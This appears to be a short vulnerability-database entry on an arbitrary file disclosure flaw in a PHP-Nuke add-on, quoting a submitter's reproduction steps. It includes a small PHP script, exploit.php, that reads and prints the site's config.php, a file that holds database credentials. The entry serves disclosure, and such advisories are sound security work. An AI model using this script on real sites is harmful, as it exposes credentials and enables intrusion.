• info
• discussion
• exploit
• solution
• references

PHP Nuke AddOn Arbitrary File Disclosure Vulnerability

<supergate@twlc.net> submitted these steps for reproducing this vulnerability:

if i put something like this:

<?php
$db = "config.php";
$fdb = @file($db);
$ldb = count($fdb);
while ($ldb>=0){
echo $fdb [$ldb];
$ldb--;
};
?>

and name it to exploit.php and put it in the main directory? it simply allowed me to read config.php.